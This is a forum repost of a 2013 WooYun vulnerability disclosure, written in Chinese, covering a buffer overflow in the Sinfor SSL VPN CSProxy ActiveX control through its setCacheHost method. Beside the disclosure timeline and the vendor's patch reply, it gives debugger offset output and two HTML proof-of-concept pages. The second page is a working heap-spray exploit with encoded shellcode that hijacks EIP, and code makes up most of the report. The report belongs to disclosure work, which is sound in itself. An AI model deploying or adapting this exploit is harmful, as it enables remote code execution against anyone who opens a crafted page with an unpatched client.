发新话题
打印

深信服SSLVPN漏洞 #3 Sinfor CSProxy Class Activex Remote Code Execution

深信服SSLVPN漏洞 #3 Sinfor CSProxy Class Activex Remote Code Execution

漏洞概要
缺陷编号:        WooYun-2013-42986
漏洞标题:        #3 Sinfor CSProxy Class Activex Remote Code Execution
相关厂商:        深信服
漏洞作者:        想要减肥的胖纸
提交时间:        2013-11-15 13:55
公开时间:        2014-02-13 13:56
漏洞类型:        远程代码执行
危害等级:        高
自评Rank:        15
漏洞状态:        厂商已经确认
漏洞来源:        http://www.wooyun.org
Tags标签:       缓冲区溢出 activex漏洞

漏洞详情披露状态:
2013-11-15:        细节已通知厂商并且等待厂商处理中
2013-11-15:        厂商已经确认,细节仅向厂商公开
2013-11-18:        细节向第三方安全合作伙伴开放
2013-11-25:        细节向核心白帽子及相关领域专家公开
2013-12-05:        细节向普通白帽子公开
2013-12-25:        细节向实习白帽子公开
2014-02-13:        细节向公众公开

简要描述:Looking for cyclic pattern in memory
EIP overwritten with lower pattern : 0x6a61326a (offset 277)
ECX overwritten with lower pattern : 0x6a61326a (offset 277)
[+] Examining SEH chain

SEH record (nseh field) at 0x016ad18c overwritten with lower pattern : 0x6a61326a (offset 273), followed by 4 bytes of cyclic data
[+] Examining stack (entire stack) - looking for cyclic pattern
Walking stack from 0x0168f000 to 0x016afffc (0x00020ffc bytes)
0x016ad07d : Contains lower cyclic pattern at ESP+0x435 (+1077) : offset 2, length 259 (-> 0x016ad17f : ESP+0x538)
0x016ad185 : Contains lower cyclic pattern at ESP+0x53d (+1341) : offset 266, length 15 (-> 0x016ad193 : ESP+0x54c)
0x016ad199 : Contains lower cyclic pattern at ESP+0x551 (+1361) : offset 286, length 7714 (-> 0x016aefba : ESP+0x2373)

详细说明:
code 区域名称:         CSProxy Class
发行者:        Sinfor Technologies  Co.,Ltd
类型:         ActiveX 控件
版本:         4. 2. 1. 3
文件日期:      
上次访问日期:     2013年11月15日,13:03
类 ID:       {53EC2F48-968E-4A42-B99B-9F6571474213}
使用计数:       765
阻止次数:       0
文件:         ProxyIE.dll
文件夹:        C:\Program Files\Sinfor\SSL\ClientComponent3



setCacheHost提交大于276个字符之后溢出



mona计算的偏移


code 区域+] Looking for cyclic pattern in memory
    EIP overwritten with lower pattern : 0x6a61326a (offset 277)
    ECX overwritten with lower pattern : 0x6a61326a (offset 277)
[+] Examining SEH chain

    SEH record (nseh field) at 0x016ad18c overwritten with lower pattern : 0x6a61326a (offset 273), followed by 4 bytes of cyclic data
[+] Examining stack (entire stack) - looking for cyclic pattern
    Walking stack from 0x0168f000 to 0x016afffc (0x00020ffc bytes)
    0x016ad07d : Contains lower cyclic pattern at ESP+0x435 (+1077) : offset 2, length 259 (-> 0x016ad17f : ESP+0x538)
    0x016ad185 : Contains lower cyclic pattern at ESP+0x53d (+1341) : offset 266, length 15 (-> 0x016ad193 : ESP+0x54c)
    0x016ad199 : Contains lower cyclic pattern at ESP+0x551 (+1361) : offset 286, length 7714 (-> 0x016aefba : ESP+0x2373)

0x033829b7 msvcrt._strlwr把字符转成小写 所以mona计算的偏移可能不准确

漏洞证明:
code 区域<html>
<head>   
        <title>Sangfor Activex overflow PoC</title>
</head>
<!--

0x033829b7 msvcrt._strlwr把字符转成小写
-->
<body>
    <object classid="clsid:53EC2F48-968E-4A42-B99B-9F6571474213" id='poc'></object>
    <script>

junk1 = "";
while(junk1.length < 276) junk1+="A";
eip = "DDDD";
payload = junk1 + eip;
poc.setCacheHost(payload);   
</script>
</body>
</html>

DDDD被转换成dddd 覆盖eip 见下图






code 区域<html>
<title>Sangfor Activex overflow PoC</title>


<object classid='clsid:53EC2F48-968E-4A42-B99B-9F6571474213' id='target' ></object>

<script >
var shellcode = unescape('%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063');
var bigblock = unescape('%u\9090%u\9090');
var headersize = 20;
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
var memory = new Array();
for (i = 0; i < 500; i++){ memory = block + shellcode }

junk1 = "";
while(junk1.length < 276) junk1+="C";


eip = "\x0c\x0c\x0c\x0c";

payload = junk1 + eip;

target.setCacheHost(payload);

</script>
</html>

修复方案:
版权声明:转载请注明来源 想要减肥的胖纸@乌云

漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2013-11-15 17:23
厂商回复:亲,跟你上次提交的属同类问题。补丁包已发,这台估计还没升级。
最新状态:暂无
原文:http://www.wooyun.org/bugs/wooyun-2013-042986

[ 本帖最后由 linda 于 2016-2-3 18:33 编辑 ]

TOP

发新话题